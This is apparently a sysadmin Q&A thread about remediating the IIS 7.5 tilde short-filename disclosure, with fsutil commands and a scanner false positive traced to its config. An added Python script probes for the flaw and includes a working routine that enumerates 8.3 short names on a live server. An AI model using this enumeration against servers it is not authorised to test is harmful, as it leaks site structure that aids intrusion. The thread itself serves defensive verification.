One of our IIS servers (IIS 7.5, Server 2008 R2) is apparently "vulnerable" to the tilde Short Filename disclosure issue.

However, I'm having a hard time actually fixing the issue. So far, I've

  • Disabled 8.3 filenames, stopped the web server, recreated the site directory and started the service again

  • Added a filter rule for a tilde in the URL:

[screenshot]

  • Added a filter rule for a tilde ANYWHERE:

[screenshot]

  • IISRESET a couple of times

  • Checked that web.config has the relevant filter rules added

... but still, I can't get my site to pass the test:

java -jar ~/temp/IIS-ShortName-Scanner-master/IIS_shortname_scanner.jar http://www.example.com

[...SNIP...]

Testing request method: "TRACE" with magic part: "/webresource.axd" ...
Testing request method: "DEBUG" with magic part: "" ...
Testing request method: "OPTIONS" with magic part: "" ...
Testing request method: "GET" with magic part: "" ...
Reliable request method was found = GET
Reliable magic part was found = 
144 requests have been sent to the server:

<<< The target website is vulnerable! >>>

What else do I need to do to resolve this?

EDIT: here's DIR /x which appears to show no 8.3 filenames:

[screenshot]

and here's the app pool for the site (all other sites on the server are the same):

[screenshot]

EDIT2: Verification there's no 8.3 filenames left:

[screenshot]

KenD
  • A quick way to double check if there are any 8.3 names in a directory is `dir /x`. Your site might have symbolic links to directories that still contain auto-generated 8.3 names. – Brian Feb 25 '15 at 17:29
  • No sign of any 8.3 filenames I'm afraid :( – KenD Feb 25 '15 at 17:36
  • Installing .NET 4.0 (which is not vulnerable to this exploit) is the other common workaround for this issue. Have you tried that yet? – HopelessN00b Feb 26 '15 at 09:58
  • .Net 4 is installed, and all application pools on the server are set to use `.NET Framework v4.0.30319` - see screenshot in edit above. – KenD Feb 26 '15 at 16:12
  • Wow. Probably grasping at straws here, but are you sure the vulnerability scanner you're using is reliable? Try a different tool, or try to execute the attack manually and see what you see. – HopelessN00b Feb 26 '15 at 20:22
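HopelessN00b's suggestion to execute the attack manually can be done with a short script. The following is an added example, not code from the original question or from the IIS-ShortName-Scanner project. Unlike the scanner, it does not search for a "reliable" request method and magic part; it fixes GET and the /.aspx suffix and reports a host as vulnerable only on the classic IIS 7.x split (404 for a wildcard that can match an existing short name, 400 for one that cannot), so a server that answers both probes alike is reported clean. The `fake_iis` transport, the host name `example.test` and the short names `SECRET~1` and `WEB~1` are constructed for offline testing and are not from the thread.

```python
"""Manual differential probe for the IIS 8.3 short-name (tilde) disclosure.

Added example; not code from the original thread or from IIS-ShortName-Scanner.
Decision rule (classic IIS 7.x signature): a wildcard that can match an existing
short name, e.g. /*~1*/.aspx, is answered 404, while a wildcard that can match
nothing, e.g. /zzzzzzzz*~1*/.aspx, is answered 400.
"""
import fnmatch
import http.client
import string
from typing import Callable, Iterable
from urllib.parse import urlsplit

# transport(method, host, port, scheme, path) -> HTTP status code
Transport = Callable[[str, str, int, str, str], int]

MAGIC_PART = "/.aspx"          # assumed suffix; the scanner tries several of these
ALPHABET = string.ascii_lowercase + string.digits + "_-"  # characters used in 8.3 stems
SHORT_STEM_LEN = 6             # an 8.3 stem has at most 6 characters before "~N"


def live_transport(method: str, host: str, port: int, scheme: str, path: str) -> int:
    """Send one request to a real server and return only the status code."""
    cls = http.client.HTTPSConnection if scheme == "https" else http.client.HTTPConnection
    conn = cls(host, port, timeout=10)
    try:
        conn.request(method, path)
        return conn.getresponse().status
    finally:
        conn.close()


def fake_iis(short_names: Iterable[str]) -> Transport:
    """Constructed stand-in for an IIS 7.5 host exposing the given 8.3 names
    (e.g. "SECRET~1"): 404 when the tilde segment matches one, otherwise 400."""
    names = [n.lower() for n in short_names]

    def transport(method, host, port, scheme, path):
        segment = next((s for s in path.split("/") if "~" in s), "")
        hit = any(fnmatch.fnmatchcase(n, segment.lower()) for n in names)
        return 404 if hit else 400
    return transport


def _target(url: str):
    p = urlsplit(url)
    scheme = p.scheme or "http"
    port = p.port or (443 if scheme == "https" else 80)
    return p.hostname, port, scheme, (p.path or "/").rstrip("/")


def probe_paths(base_path: str, magic_part: str = MAGIC_PART):
    """(pattern that matches any short name, pattern that cannot match one)."""
    base = base_path.rstrip("/")
    return f"{base}/*~1*{magic_part}", f"{base}/zzzzzzzz*~1*{magic_part}"


def check_short_names(url: str, method: str = "GET",
                      transport: Transport = live_transport) -> dict:
    """Two requests; 'vulnerable' only on the exact 404/400 split, so a host that
    answers both probes alike (no 8.3 names left, or '~' denied by request
    filtering) is reported as not vulnerable."""
    host, port, scheme, base = _target(url)
    exists, missing = probe_paths(base)
    s_exist = transport(method, host, port, scheme, exists)
    s_missing = transport(method, host, port, scheme, missing)
    return {"existing_status": s_exist, "missing_status": s_missing,
            "vulnerable": s_exist == 404 and s_missing == 400}


def enumerate_short_names(url: str, transport: Transport = live_transport,
                          method: str = "GET", alphabet: str = ALPHABET) -> list:
    """Recover short-name stems one character at a time (depth-first); this is
    what the disclosure actually leaks. Returns stems without the '~1' suffix."""
    host, port, scheme, base = _target(url)
    found = []

    def status(pattern):
        return transport(method, host, port, scheme, f"{base}/{pattern}{MAGIC_PART}")

    def walk(prefix):
        if len(prefix) >= SHORT_STEM_LEN:
            return
        for ch in alphabet:
            stem = prefix + ch
            if status(f"{stem}*~1*") != 404:   # no short name starts with this stem
                continue
            if status(f"{stem}~1*") == 404:    # stem is complete, not just a prefix
                found.append(stem)
            walk(stem)

    walk("")
    return found


if __name__ == "__main__":
    import sys
    print(check_short_names(sys.argv[1] if len(sys.argv) > 1 else "http://www.example.com/"))
```

If the two status codes differ but are not the 404/400 pair, look at both responses by hand (a custom error page or a WAF in front of IIS can produce a split of its own) before trusting either this probe or the scanner's verdict.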

5 Answers

Try to scan for existing short filenames with fsutil:

  • fsutil 8dot3name scan /s /v E:\inetpub\wwwroot

And strip them if they are found:

  • fsutil 8dot3name strip /s /v E:\inetpub\wwwroot

Also, looking at the log with an empty magic part (magic part: ""), I wonder whether that could be a bug in the PoC. This line in config.xml looks like it has an extra comma after /webresource.axd:

<entry key="magicFinalPartList">
 <![CDATA[\a.aspx,\a.asp,/a.aspx,/a.asp,/a.shtml,/a.asmx,/a.ashx,/a.config,/a.php,/a.jpg,/webresource.axd,,/a.xxx]]>
</entry>

I've asked the dev via Twitter about it and he responded:

For rare cases in which no extensions were required. But, recently that has caused more problems only! I'll remove it now.

I removed it from the Config file. This was the 2nd complaint so it was the right time for this change.

So, it seems that you're safe now :)

beatcracker
  • Afraid there's no change - see "EDIT2" in my original post :( – KenD Mar 01 '15 at 21:27
  • Looking at the log with empty magic part (`magic part: ""`), I wonder, could that be a bug in the POC. This line in [config.xml](https://github.com/irsdl/IIS-ShortName-Scanner/blob/master/config.xml) _looks_ like it has extra comma after `/webresource.axd`: `<![CDATA[\a.aspx,\a.asp,/a.aspx,/a.asp,/a.shtml,/a.asmx,/a.ashx,/a.config,/a.php,/a.jpg,/webresource.axd,,/a.xxx]]>` – beatcracker Mar 02 '15 at 15:37
  • That's **very** interesting - although, looking back through the revisions, that "double comma" has been in the code for a while. Removing it means the test now runs without any obvious error... – KenD Mar 02 '15 at 16:44
  • Ha, you're safe, see update! – beatcracker Mar 02 '15 at 20:34
  • All that work and we were safe all along :) Thanks for your help and contacting the dev! – KenD Mar 03 '15 at 08:56
Also: "NOTE: The change to the NtfsDisable8dot3NameCreation registry entry affects only files, folders, and profiles that are created after the change. Files that already exist are not affected."

Note: Although disabling 8.3 file name creation increases file performance under Windows, some applications (16-bit, 32-bit, or 64-bit) may not be able to find files and directories that have long file names.

The best solution is below as we cannot strip after every new deployment.

Test/scan the site for the vulnerability with the link below (install Java and run the command to test/scan).

Command to scan the site:

java -jar iis_shortname_scanner.jar 2 20 https://example.com/

Scan for existing short filenames:

fsutil 8dot3name scan /s /v c:\inetpub\wwwroot

Check 8dot3 name creation is disabled or enabled:

fsutil 8dot3name query C:\Release\SiteRootDocumentPath

If 8dot3 name creation is enabled, use below command to disable:

fsutil 8dot3name set C:\Release\SiteRootDocumentPath 1

The 8dot3name property is set to enable 8dot3 name creation on the specified volume (0) or to disable 8dot3 name creation on the specified volume (1).

Even if you redeploy the code to the site's physical (SiteRootDocument) path, it won't create files with short names.

The scan will pass :)

Aditya Y
Unfortunately, the only way to really deal with this is an annoying set of gyrations, depending on your version of Windows, to disable the ability to generate 8.3 names.

For your version of Windows:

To disable 8.3 name creation on all NTFS partitions, type fsutil.exe behavior set disable8dot3 1 at an elevated command prompt, and then press Enter.

Source: http://support.microsoft.com/kb/121007

Dave Holland
I'm not exactly sure how the script works or how your network is set up, but how about filtering via something in front of the IIS server (even if it's just a virtual device in a virtual machine)? Namely, you set up an IPS with a rule that specifically drops traffic pertaining to that particular issue.

dtbnguyen